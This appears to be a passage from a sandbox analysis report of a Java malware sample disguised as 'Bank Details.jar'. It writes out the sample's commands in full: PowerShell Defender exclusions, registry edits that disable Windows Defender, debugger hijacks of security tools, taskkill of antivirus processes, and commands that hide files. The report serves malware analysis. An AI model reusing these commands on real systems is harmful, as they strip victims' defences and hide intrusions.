PID 720 wrote to memory of 4240	720	java.exe	352
PID 720 wrote to memory of 4312	720	java.exe	354
PID 720 wrote to memory of 4312	720	java.exe	354

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3780	attrib.exe
2528	attrib.exe
3824	attrib.exe
608	attrib.exe
996	attrib.exe
1960	attrib.exe
3832	attrib.exe
3068	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Bank Details.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:720
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3396
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1944
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1728
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3832
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3068
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\FVKwo\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3780
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\FVKwo\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2528
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\FVKwo
  2⤵
  - Views/modifies file attributes
  PID:3824
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\FVKwo
  2⤵
  - Views/modifies file attributes
  PID:608
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\FVKwo
  2⤵
  - Views/modifies file attributes
  PID:996
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\FVKwo\WbZqr.class
  2⤵
  - Views/modifies file attributes
  PID:1960
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3816
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\FVKwo','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\FVKwo\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1748
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1844
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1752
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1920
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:1500
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:60
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2684
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3752
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3932
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:3848
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1196
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3356
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:924
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:344
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3028
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1500
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3828
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3784
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2648
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:612
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:60
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:3824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:3156
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2504
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1456
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:468
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:728
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:612
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:3328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:2792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:2068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:3612
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2168
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1228
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:2528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:3884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:3904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:396
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:2068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:3652
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:2464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:1360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:3436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:2408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:2684
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:3368
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:916
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1756
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:3804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:1196
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:3416
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:2100
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2668
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:3888
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:1228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1584
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:3796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:3808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1612
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:2792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:968
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:1356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:3436
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:2996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:3004
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:1664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:1456
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:1628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:916
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:2844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:3352
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:2688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1240
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:3352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1240
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4236
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4256
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4312
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4332
- - C:\Windows\system32\reg.exe
